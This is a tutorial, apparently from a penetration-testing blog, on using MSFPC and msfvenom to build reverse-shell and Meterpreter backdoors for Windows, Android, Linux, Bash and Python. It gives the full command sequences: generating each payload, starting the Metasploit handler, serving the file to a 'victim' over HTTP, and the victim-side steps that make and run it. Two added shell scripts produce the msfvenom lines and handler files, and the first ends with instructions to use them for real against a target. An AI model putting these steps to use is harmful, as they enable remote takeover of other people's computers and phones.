Comprehensive Guide to MSFPC


Hello Friends!!
As you are all aware, MSFvenom is the payload-generation tool in Kali Linux. MSFvenom Payload Creator (MSFPC) sits on top of it: a wrapper that generates various "basic" Meterpreter payloads via msfvenom, with the end goal of fully automating both msfvenom and the matching Metasploit handler.

MSFvenom Payload Creator (MSFPC) is a wrapper that generates multiple types of payloads based on the user's choice. The idea is to be as simple as possible, requiring only one input (the target platform) to produce a payload.

Author: g0tmi1k

SYNTAX
msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

Only TYPE (the target platform or file format) is required. Every argument in parentheses is optional and msfpc recognises them in any order, which is why the commands later on this page mix them freely (e.g. msfpc msf batch eth0).
Create a Payload with Interactive IP Mode
Let's create a payload for the Windows platform, giving only the platform:

msfpc windows

Because no IP address or interface was given, msfpc first asks which interface's address should be used as LHOST:

Which interface should be used?
eth0, lo, wan

We press 1 for eth0. msfpc then generates the payload and reports three things:

1.       The location of the generated Windows Meterpreter payload and of the MSF handler (resource) file.
2.       The command that starts multi/handler automatically inside the Metasploit Framework.
3.       The command that starts a web server for transferring the file to the target.



Basically, msfpc is designed to reduce the user's effort in generating payloads for various platforms, each in the file format appropriate to that platform. Running msfpc with no arguments prints its help text, which lists every supported TYPE and the file format each one produces.
Syntax: msfpc


Windows Payload

If you want a Meterpreter session on a victim machine running Windows, all you need to type is:
msfpc windows 192.168.1.109 1234
If you omit the IP, msfpc prompts for an interface as discussed above; if you omit the port, it uses 443 as the default LPORT. The windows type produces the backdoor as a 32-bit .exe. msfpc then generates the payload and reports the following details:

·         Location of the MSF handler file and the Windows Meterpreter payload: '/root/windows-meterpreter-staged-reverse-tcp-1234.exe'
·         Command to start multi/handler automatically: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
·         Command to serve the file over HTTP for transfer: python2 -m SimpleHTTPServer 8080 (on systems without Python 2, python3 -m http.server 8080 is the equivalent)



Now run the following two commands (in separate terminals) to launch multi/handler and the web server for file transfer. Start the web server from the directory that holds the payload, because SimpleHTTPServer serves its current working directory:
msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
python2 -m SimpleHTTPServer 8080



When the victim browses to the following URL, the browser offers the .exe for download; running it returns a Meterpreter session to the attacker. Note the form of the URL: the server listens on port 8080 and serves its working directory as the web root, so the filesystem path (/root/) does not appear in it.
http://192.168.1.109:8080/windows-meterpreter-staged-reverse-tcp-1234.exe
Note: Previously an attacker would generate the payload by hand with an msfvenom command and then configure the Metasploit module multi/handler to receive the reverse connection as a Meterpreter session. That approach works well but takes time and several commands; MSFPC performs exactly the same two steps for the various "basic" Meterpreter payloads msfvenom can produce.
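To make the equivalence described in the paragraph above concrete, here is an added example, written for this page and not taken from msfpc, of the two steps it automates: the msfvenom command line and the multi/handler resource file, plus the download URL the web server actually exposes. The helper names, the .rc contents (a minimal handler written here, not a copy of msfpc's) and the use of a temporary directory are this example's own.

```bash
#!/usr/bin/env bash
# Added example (not msfpc's own code): the msfvenom + multi/handler steps that
# `msfpc windows 192.168.1.109 1234` wraps, written out as shell functions.
# Nothing here runs msfvenom or msfconsole; it produces the command line, the
# resource (.rc) file and the download URL so each piece can be inspected.
# Output file name and rc contents follow this example's own conventions.
set -eu

# msfvenom command line for a given payload (printed, not executed).
# $1 payload  $2 LHOST  $3 LPORT  $4 output format  $5 output file
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' "$1" "$2" "$3" "$4" "$5"
}

# Resource script that `msfconsole -q -r <file>` replays: start multi/handler
# as a background job and keep listening after the first session arrives.
# The PAYLOAD here must match the one msfvenom was given, exactly.
# $1 payload  $2 LHOST  $3 LPORT
handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$1"
    printf 'set LHOST %s\n' "$2"
    printf 'set LPORT %s\n' "$3"
    printf 'set ExitOnSession false\n'
    printf 'exploit -j\n'
}

# URL the target fetches when `python2 -m SimpleHTTPServer 8080` (or
# `python3 -m http.server 8080`) is started in the directory holding the file.
# The server listens on 8080 and maps that directory to "/", so only the
# file's base name appears in the URL, never the /root/... filesystem path.
# $1 LHOST  $2 HTTP port  $3 path of the generated file
serve_url() {
    printf 'http://%s:%s/%s\n' "$1" "$2" "$(basename "$3")"
}

# Walk through the page's Windows example and write the .rc next to where the
# payload would be (a temp directory here, so the demo is side-effect free).
demo() {
    payload=windows/meterpreter/reverse_tcp
    lhost=192.168.1.109
    lport=1234
    workdir=$(mktemp -d)
    out="$workdir/windows-meterpreter-staged-reverse-tcp-$lport.exe"
    rc="${out%.exe}-exe.rc"

    echo "# 1. generate the payload:"; venom_cmd "$payload" "$lhost" "$lport" exe "$out"
    handler_rc "$payload" "$lhost" "$lport" > "$rc"
    echo "# 2. start the handler:"; echo "msfconsole -q -r '$rc'"
    echo "# 3. serve it (run inside $workdir):"; echo "python3 -m http.server 8080"
    echo "# 4. target downloads:"; serve_url "$lhost" 8080 "$out"
    rm -r "$workdir"
}

demo
```

Save it as manual_handler.sh and run it to see the four steps printed. To use it for real, execute the printed msfvenom line, start msfconsole -q -r on the .rc file, then start the HTTP server inside the directory containing the .exe and hand the target the URL from step 4.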



Android Payload
If you want a Meterpreter session on a victim device running Android, all you need to type is:
msfpc apk 192.168.1.109 1234
This creates a malicious backdoor in .apk format. Note from the filename that msfpc produced a stageless payload for this type, so the handler it writes uses Metasploit's stageless name (android/meterpreter_reverse_tcp) rather than the staged android/meterpreter/reverse_tcp. msfpc then reports the following details:
·         Location of the MSF handler file and the Android Meterpreter payload: '/root/android-meterpreter-stageless-reverse-tcp-1234.apk'
·         Command to start multi/handler automatically: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
·         Command to serve the file over HTTP for transfer: python2 -m SimpleHTTPServer 8080



Now run the following commands to launch multi/handler and the web server for file transfer (start the web server in the directory that holds the .apk).
msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'

python2 -m SimpleHTTPServer 8080

When the victim browses to the following URL, Android offers to install the application; once the .apk is installed and opened, it returns a Meterpreter session to the attacker (the device must permit installation from unknown sources). As with the Windows payload, the URL uses port 8080 and the bare filename, not the /root/ path.
http://192.168.1.109:8080/android-meterpreter-stageless-reverse-tcp-1234.apk



As you can see, we have a Meterpreter session on the target device.



BASH
The advantage of MSFPC is that it removes the need to remember the msfvenom format for each platform: just follow the syntax declared above and MSFPC handles the rest. Suppose we want a payload for a Bash shell; MSFPC generates it in a few seconds.

msfpc bash 192.168.1.109 1234
This creates a malicious backdoor in .sh format. Unlike the previous two types, this one is a command-shell payload (note "shell" rather than "meterpreter" in the filename). msfpc then reports the following:
·         Location of the MSF handler file and the Bash shell payload: '/root/bash-shell-staged-reverse-tcp-1234.sh'
·         Command to start multi/handler automatically: msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
·         Command to serve the file over HTTP for transfer: python2 -m SimpleHTTPServer 8080



Now run the following commands to launch multi/handler and the web server for file transfer (start the web server in the directory that holds the .sh).
msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'

python2 -m SimpleHTTPServer 8080

When the victim fetches the following URL and saves the script, it only needs execute permission before it can be run (chmod +x is sufficient; chmod 777 also makes the file world-writable, which is unnecessary). Once the target runs it, it hands back a command shell.
http://192.168.1.109:8080/bash-shell-staged-reverse-tcp-1234.sh
chmod +x bash-shell-staged-reverse-tcp-1234.sh
./bash-shell-staged-reverse-tcp-1234.sh



As you can see, we have a command shell on the target machine. The following msfconsole command upgrades session 1 to a Meterpreter session (it runs the post/multi/manage/shell_to_meterpreter module for you):
sessions -u 1



Linux
If you want a session on a victim machine running Linux, all you need to type is:
msfpc linux 192.168.1.109 4444
This creates a malicious backdoor in .elf format. As the filename shows, msfpc produced a command-shell payload here rather than Meterpreter; we upgrade it to Meterpreter below. msfpc then reports the following details:
·         Location of the MSF handler file and the Linux shell payload: '/root/linux-shell-staged-reverse-tcp-4444.elf'
·         Command to start multi/handler automatically: msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
·         Command to serve the file over HTTP for transfer: python2 -m SimpleHTTPServer 8080




Now run the following commands to launch multi/handler and the web server for file transfer (start the web server in the directory that holds the .elf).
msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'

python2 -m SimpleHTTPServer 8080

When the victim fetches the following URL and saves the binary, it needs execute permission (chmod +x is sufficient); once the target runs the .elf, it hands back a command shell.
http://192.168.1.109:8080/linux-shell-staged-reverse-tcp-4444.elf
chmod +x linux-shell-staged-reverse-tcp-4444.elf
./linux-shell-staged-reverse-tcp-4444.elf



As you can see, we have a command shell on the target machine; as before, the following command upgrades session 1 to a Meterpreter session:
sessions -u 1


Python
If you want a Meterpreter session on a victim machine that has a Python interpreter, all you need to type is:
msfpc python 192.168.1.109 5555
This creates a malicious backdoor in .py format. msfpc then generates the payload and reports the following details:
·         Location of the MSF handler file and the Python Meterpreter payload: '/root/python-meterpreter-staged-reverse_tcp-5555.py'
·         Command to start multi/handler automatically: msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
·         Command to serve the file over HTTP for transfer: python2 -m SimpleHTTPServer 8080



Now run the following commands to launch multi/handler and the web server for file transfer (start the web server in the directory that holds the .py).
msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'

python2 -m SimpleHTTPServer 8080

When the victim fetches the following URL and saves the script, running it with the target's Python interpreter returns a Meterpreter session directly; no upgrade step is needed because this type is a Meterpreter payload.
http://192.168.1.109:8080/python-meterpreter-staged-reverse_tcp-5555.py
python python-meterpreter-staged-reverse_tcp-5555.py



As you can see, we have a Meterpreter session on the target machine.


Batch (Generates all Possible Combination Payloads)
Batch is the most significant mode, as it generates every possible combination of payload for the options given. To create all payloads that provide a Meterpreter session, use:
msfpc msf batch eth0
The output lists every payload type generated for a Meterpreter session, each with its own handler .rc file. Executing a payload and receiving the reverse connection works exactly as described above.



To create all payloads that provide a command-shell session on the target machine instead, use:
msfpc cmd batch eth0
The output lists every payload type generated for a command-shell session.




Loop (Generates One Payload for Each Platform)
Loop is another important mode: it generates one payload of each type using the default values. Because the default session type is msf, each payload provides a Meterpreter session rather than a command shell.
msfpc verbose loop eth0
The output lists one payload per platform, each with its handler .rc file; the verbose keyword makes msfpc print extra detail about each step. Executing a payload and receiving the reverse connection works exactly as described above.



Generating Stageless Payloads
There are two kinds of payload, staged and stageless, and by default msfpc creates a staged one. A staged payload is a small stager that connects back and fetches the rest of the payload (the stage) from the handler; a stageless payload carries everything in the file, so it is larger but does not depend on that second transfer. To create a stageless payload for a command-shell or Meterpreter session, add the stageless keyword:

msfpc stageless cmd windows 192.168.1.109
msfpc stageless msf windows 192.168.1.109

The handler .rc file msfpc writes changes accordingly: Metasploit names stageless payloads with an underscore between stage and stager (e.g. windows/meterpreter_reverse_tcp) instead of the slash used for staged ones (windows/meterpreter/reverse_tcp), and the handler must be set to the same name as the file that was generated. The rest of the technique is as above: execute the payload and receive the reverse connection.
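The staged/stageless switch, and the batch and loop modes above, come down to which Metasploit payload name ends up in the .rc file. The following is an added example, not part of msfpc or of this page's original text, that derives those names for the types used on this page and lists what loop and batch enumerate. The type table, the file-name layout and the assumption that every loop entry is staged are this example's own simplifications; msfpc's real per-type defaults differ (the apk earlier on this page came out stageless, and the linux type produced a shell).

```bash
#!/usr/bin/env bash
# Added example (not msfpc's own code): how this page's msfpc types map onto
# Metasploit payload names, and how the staged/stageless choice changes the
# name the handler must be given. Only names are derived; nothing is built.
# The type -> Metasploit path table and the file-name layout are this
# example's own, modelled on the file names msfpc printed earlier on the page.
set -eu

# Metasploit's naming rule: a staged payload is <os>/<stage>/<stager>
# (windows/meterpreter/reverse_tcp: small stager, stage sent by the handler);
# a stageless one fuses stage and stager with an underscore
# (windows/meterpreter_reverse_tcp: everything is in the file). Only the TCP
# transport is covered; check other combinations with `msfvenom -l payloads`.
# $1 type (windows|linux|apk|python|bash)  $2 msf|cmd  $3 staged|stageless
msf_payload() {
    case "$1" in
        windows)     base=windows ;;
        linux)       base=linux/x86 ;;   # 32-bit ELF, matching the page's .elf
        apk|android) base=android ;;
        python)      base=python ;;
        bash)        # a cmd/unix payload is one script: no stager/stage split
                     printf 'cmd/unix/reverse_bash\n'; return 0 ;;
        *)           printf 'unsupported type: %s\n' "$1" >&2; return 1 ;;
    esac
    case "$2" in
        msf) part=meterpreter ;;
        cmd) part=shell ;;
        *)   printf 'session kind must be msf or cmd, got %s\n' "$2" >&2; return 1 ;;
    esac
    if [ "$3" = stageless ]; then
        printf '%s/%s_reverse_tcp\n' "$base" "$part"
    else
        printf '%s/%s/reverse_tcp\n' "$base" "$part"
    fi
}

# File name in the <os>-<shell>-<stage>-<direction>-<transport>-<port>.<ext>
# layout seen in msfpc's output; the handler file is the same name plus .rc.
# bash is always a shell payload, whatever session kind was asked for.
# $1 type  $2 msf|cmd  $3 staged|stageless  $4 port
msfpc_filename() {
    case "$1" in
        windows) os=windows; ext=exe ;;
        linux)   os=linux;   ext=elf ;;
        apk)     os=android; ext=apk ;;
        python)  os=python;  ext=py ;;
        bash)    os=bash;    ext=sh ;;
        *)       printf 'unsupported type: %s\n' "$1" >&2; return 1 ;;
    esac
    if [ "$1" = bash ] || [ "$2" = cmd ]; then kind=shell; else kind=meterpreter; fi
    printf '%s-%s-%s-reverse-tcp-%s.%s\n' "$os" "$kind" "$3" "$4" "$ext"
}

# What `loop` enumerates in this simplified model: one staged payload per
# type, printed as "<file>  <payload>" so the file/handler pairing is visible.
# $1 port
loop_all() {
    for t in windows linux apk python bash; do
        printf '%s  %s\n' "$(msfpc_filename "$t" msf staged "$1")" "$(msf_payload "$t" msf staged)"
    done
}

# What `batch` enumerates for one type: every session kind x stage combination.
# $1 type  $2 port
batch_type() {
    for k in msf cmd; do
        for st in staged stageless; do
            printf '%s  %s\n' "$(msfpc_filename "$1" "$k" "$st" "$2")" "$(msf_payload "$1" "$k" "$st")"
        done
    done
}

loop_all 443
echo ---
batch_type windows 443
```

Run it to see the loop list followed by the four windows batch entries. The practical check it encodes: before starting a handler, compare the payload name in the .rc with the staged/stageless flag in the generated file's name; a staged file with a stageless handler (or vice versa) connects but never yields a session.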


